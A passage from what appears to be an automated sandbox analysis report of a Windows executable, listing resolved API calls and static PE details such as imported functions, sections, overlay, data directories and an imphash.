- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.HeapSize",
- "kernel32.dll.RtlUnwindEx",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.RtlLookupFunctionEntry",
- "kernel32.dll.RtlVirtualUnwind",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.Sleep",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.TlsSetValue",
- "kernel32.dll.TlsFree",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.OutputDebugStringW",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.GetConsoleCP",
- "user32.dll.wsprintfA",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "servicedll.dll.ServiceMain",
- "servicedll.dll.SvchostPushServiceGlobals",
- "termsrv.dll.ServiceMain",
- "termsrv.dll.SvchostPushServiceGlobals",
- "ole32.dll.CoFreeUnusedLibrariesEx",
- "ole32.dll.CoRegisterClassObject",
- "rpcrt4.dll.UuidFromStringW",
- "radarrs.dll.WdiDiagnosticModuleMain",
- "radarrs.dll.WdiHandleInstance",
- "radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion",
- "advapi32.dll.DuplicateToken"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetTempPathA",
- "address": "0x407070"
- },
- {
- "name": "GetFileSize",
- "address": "0x407074"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x407078"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40707c"
- },
- {
- "name": "CopyFileA",
- "address": "0x407080"
- },
- {
- "name": "ExitProcess",
- "address": "0x407084"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x407088"
- },
- {
- "name": "Sleep",
- "address": "0x40708c"
- },
- {
- "name": "GetTickCount",
- "address": "0x407090"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x407094"
- },
- {
- "name": "lstrlenA",
- "address": "0x407098"
- },
- {
- "name": "GetVersion",
- "address": "0x40709c"
- },
- {
- "name": "SetErrorMode",
- "address": "0x4070a0"
- },
- {
- "name": "lstrcpynA",
- "address": "0x4070a4"
- },
- {
- "name": "GetDiskFreeSpaceA",
- "address": "0x4070a8"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x4070ac"
- },
- {
- "name": "GetWindowsDirectoryA",
- "address": "0x4070b0"
- },
- {
- "name": "SetCurrentDirectoryA",
- "address": "0x4070b4"
- },
- {
- "name": "GetLastError",
- "address": "0x4070b8"
- },
- {
- "name": "CreateDirectoryA",
- "address": "0x4070bc"
- },
- {
- "name": "CreateProcessA",
- "address": "0x4070c0"
- },
- {
- "name": "RemoveDirectoryA",
- "address": "0x4070c4"
- },
- {
- "name": "CreateFileA",
- "address": "0x4070c8"
- },
- {
- "name": "GetTempFileNameA",
- "address": "0x4070cc"
- },
- {
- "name": "ReadFile",
- "address": "0x4070d0"
- },
- {
- "name": "WriteFile",
- "address": "0x4070d4"
- },
- {
- "name": "lstrcpyA",
- "address": "0x4070d8"
- },
- {
- "name": "MoveFileExA",
- "address": "0x4070dc"
- },
- {
- "name": "lstrcatA",
- "address": "0x4070e0"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x4070e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4070e8"
- },
- {
- "name": "GetExitCodeProcess",
- "address": "0x4070ec"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x4070f0"
- },
- {
- "name": "CompareFileTime",
- "address": "0x4070f4"
- },
- {
- "name": "SetFileAttributesA",
- "address": "0x4070f8"
- },
- {
- "name": "GetFileAttributesA",
- "address": "0x4070fc"
- },
- {
- "name": "GetShortPathNameA",
- "address": "0x407100"
- },
- {
- "name": "MoveFileA",
- "address": "0x407104"
- },
- {
- "name": "GetFullPathNameA",
- "address": "0x407108"
- },
- {
- "name": "SetFileTime",
- "address": "0x40710c"
- },
- {
- "name": "SearchPathA",
- "address": "0x407110"
- },
- {
- "name": "CloseHandle",
- "address": "0x407114"
- },
- {
- "name": "lstrcmpiA",
- "address": "0x407118"
- },
- {
- "name": "CreateThread",
- "address": "0x40711c"
- },
- {
- "name": "GlobalLock",
- "address": "0x407120"
- },
- {
- "name": "lstrcmpA",
- "address": "0x407124"
- },
- {
- "name": "FindFirstFileA",
- "address": "0x407128"
- },
- {
- "name": "FindNextFileA",
- "address": "0x40712c"
- },
- {
- "name": "DeleteFileA",
- "address": "0x407130"
- },
- {
- "name": "SetFilePointer",
- "address": "0x407134"
- },
- {
- "name": "GetPrivateProfileStringA",
- "address": "0x407138"
- },
- {
- "name": "FindClose",
- "address": "0x40713c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x407140"
- },
- {
- "name": "FreeLibrary",
- "address": "0x407144"
- },
- {
- "name": "MulDiv",
- "address": "0x407148"
- },
- {
- "name": "WritePrivateProfileStringA",
- "address": "0x40714c"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x407150"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x407154"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x407158"
- },
- {
- "name": "GlobalFree",
- "address": "0x40715c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x407160"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "ScreenToClient",
- "address": "0x407184"
- },
- {
- "name": "GetSystemMenu",
- "address": "0x407188"
- },
- {
- "name": "SetClassLongA",
- "address": "0x40718c"
- },
- {
- "name": "IsWindowEnabled",
- "address": "0x407190"
- },
- {
- "name": "SetWindowPos",
- "address": "0x407194"
- },
- {
- "name": "GetSysColor",
- "address": "0x407198"
- },
- {
- "name": "GetWindowLongA",
- "address": "0x40719c"
- },
- {
- "name": "SetCursor",
- "address": "0x4071a0"
- },
- {
- "name": "LoadCursorA",
- "address": "0x4071a4"
- },
- {
- "name": "CheckDlgButton",
- "address": "0x4071a8"
- },
- {
- "name": "GetMessagePos",
- "address": "0x4071ac"
- },
- {
- "name": "LoadBitmapA",
- "address": "0x4071b0"
- },
- {
- "name": "CallWindowProcA",
- "address": "0x4071b4"
- },
- {
- "name": "IsWindowVisible",
- "address": "0x4071b8"
- },
- {
- "name": "CloseClipboard",
- "address": "0x4071bc"
- },
- {
- "name": "SetClipboardData",
- "address": "0x4071c0"
- },
- {
- "name": "EmptyClipboard",
- "address": "0x4071c4"
- },
- {
- "name": "PostQuitMessage",
- "address": "0x4071c8"
- },
- {
- "name": "GetWindowRect",
- "address": "0x4071cc"
- },
- {
- "name": "EnableMenuItem",
- "address": "0x4071d0"
- },
- {
- "name": "CreatePopupMenu",
- "address": "0x4071d4"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x4071d8"
- },
- {
- "name": "SetDlgItemTextA",
- "address": "0x4071dc"
- },
- {
- "name": "GetDlgItemTextA",
- "address": "0x4071e0"
- },
- {
- "name": "MessageBoxIndirectA",
- "address": "0x4071e4"
- },
- {
- "name": "CharPrevA",
- "address": "0x4071e8"
- },
- {
- "name": "DispatchMessageA",
- "address": "0x4071ec"
- },
- {
- "name": "PeekMessageA",
- "address": "0x4071f0"
- },
- {
- "name": "ReleaseDC",
- "address": "0x4071f4"
- },
- {
- "name": "EnableWindow",
- "address": "0x4071f8"
- },
- {
- "name": "InvalidateRect",
- "address": "0x4071fc"
- },
- {
- "name": "SendMessageA",
- "address": "0x407200"
- },
- {
- "name": "DefWindowProcA",
- "address": "0x407204"
- },
- {
- "name": "BeginPaint",
- "address": "0x407208"
- },
- {
- "name": "GetClientRect",
- "address": "0x40720c"
- },
- {
- "name": "FillRect",
- "address": "0x407210"
- },
- {
- "name": "DrawTextA",
- "address": "0x407214"
- },
- {
- "name": "EndDialog",
- "address": "0x407218"
- },
- {
- "name": "RegisterClassA",
- "address": "0x40721c"
- },
- {
- "name": "SystemParametersInfoA",
- "address": "0x407220"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x407224"
- },
- {
- "name": "GetClassInfoA",
- "address": "0x407228"
- },
- {
- "name": "DialogBoxParamA",
- "address": "0x40722c"
- },
- {
- "name": "CharNextA",
- "address": "0x407230"
- },
- {
- "name": "ExitWindowsEx",
- "address": "0x407234"
- },
- {
- "name": "GetDC",
- "address": "0x407238"
- },
- {
- "name": "CreateDialogParamA",
- "address": "0x40723c"
- },
- {
- "name": "SetTimer",
- "address": "0x407240"
- },
- {
- "name": "GetDlgItem",
- "address": "0x407244"
- },
- {
- "name": "SetWindowLongA",
- "address": "0x407248"
- },
- {
- "name": "SetForegroundWindow",
- "address": "0x40724c"
- },
- {
- "name": "LoadImageA",
- "address": "0x407250"
- },
- {
- "name": "IsWindow",
- "address": "0x407254"
- },
- {
- "name": "SendMessageTimeoutA",
- "address": "0x407258"
- },
- {
- "name": "FindWindowExA",
- "address": "0x40725c"
- },
- {
- "name": "OpenClipboard",
- "address": "0x407260"
- },
- {
- "name": "TrackPopupMenu",
- "address": "0x407264"
- },
- {
- "name": "AppendMenuA",
- "address": "0x407268"
- },
- {
- "name": "EndPaint",
- "address": "0x40726c"
- },
- {
- "name": "DestroyWindow",
- "address": "0x407270"
- },
- {
- "name": "wsprintfA",
- "address": "0x407274"
- },
- {
- "name": "ShowWindow",
- "address": "0x407278"
- },
- {
- "name": "SetWindowTextA",
- "address": "0x40727c"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "SelectObject",
- "address": "0x40704c"
- },
- {
- "name": "SetBkMode",
- "address": "0x407050"
- },
- {
- "name": "CreateFontIndirectA",
- "address": "0x407054"
- },
- {
- "name": "SetTextColor",
- "address": "0x407058"
- },
- {
- "name": "DeleteObject",
- "address": "0x40705c"
- },
- {
- "name": "GetDeviceCaps",
- "address": "0x407060"
- },
- {
- "name": "CreateBrushIndirect",
- "address": "0x407064"
- },
- {
- "name": "SetBkColor",
- "address": "0x407068"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "SHGetSpecialFolderLocation",
- "address": "0x407168"
- },
- {
- "name": "ShellExecuteExA",
- "address": "0x40716c"
- },
- {
- "name": "SHGetPathFromIDListA",
- "address": "0x407170"
- },
- {
- "name": "SHBrowseForFolderA",
- "address": "0x407174"
- },
- {
- "name": "SHGetFileInfoA",
- "address": "0x407178"
- },
- {
- "name": "SHFileOperationA",
- "address": "0x40717c"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "AdjustTokenPrivileges",
- "address": "0x407000"
- },
- {
- "name": "RegCreateKeyExA",
- "address": "0x407004"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x407008"
- },
- {
- "name": "SetFileSecurityA",
- "address": "0x40700c"
- },
- {
- "name": "OpenProcessToken",
- "address": "0x407010"
- },
- {
- "name": "LookupPrivilegeValueA",
- "address": "0x407014"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x407018"
- },
- {
- "name": "RegDeleteKeyA",
- "address": "0x40701c"
- },
- {
- "name": "RegDeleteValueA",
- "address": "0x407020"
- },
- {
- "name": "RegCloseKey",
- "address": "0x407024"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x407028"
- },
- {
- "name": "RegQueryValueExA",
- "address": "0x40702c"
- },
- {
- "name": "RegEnumKeyA",
- "address": "0x407030"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Create",
- "address": "0x407038"
- },
- {
- "name": "ImageList_AddMasked",
- "address": "0x40703c"
- },
- {
- "name": "ImageList_Destroy",
- "address": "0x407040"
- },
- {
- "name": null,
- "address": "0x407044"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "OleUninitialize",
- "address": "0x407284"
- },
- {
- "name": "OleInitialize",
- "address": "0x407288"
- },
- {
- "name": "CoTaskMemFree",
- "address": "0x40728c"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x407290"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0027b04c",
- "overlay": {
- "size": "0x0025b058",
- "offset": "0x00019000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0027b04c",
- "icon_hash": null,
- "entrypoint": "0x004031d6",
- "timestamp": "2018-12-15 22:24:22",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00006000",
- "entropy": "6.45",
- "raw_address": "0x00000400",
- "virtual_size": "0x00005f0d",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00007000",
- "size_of_data": "0x00001400",
- "entropy": "5.00",
- "raw_address": "0x00006400",
- "virtual_size": "0x00001250",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000400",
- "entropy": "5.13",
- "raw_address": "0x00007800",
- "virtual_size": "0x0001a818",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".ndata",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00024000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00009000",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002d000",
- "size_of_data": "0x00011400",
- "entropy": "1.13",
- "raw_address": "0x00007c00",
- "virtual_size": "0x000112b8",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007430",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000000a0"
- },
- {
- "virtual_address": "0x0002d000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000112b8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00272c88",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x000013d0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000298"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "3abe302b6d9a1256e6a915429af4ffd2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 7,
- "versioninfo": []
- }
- }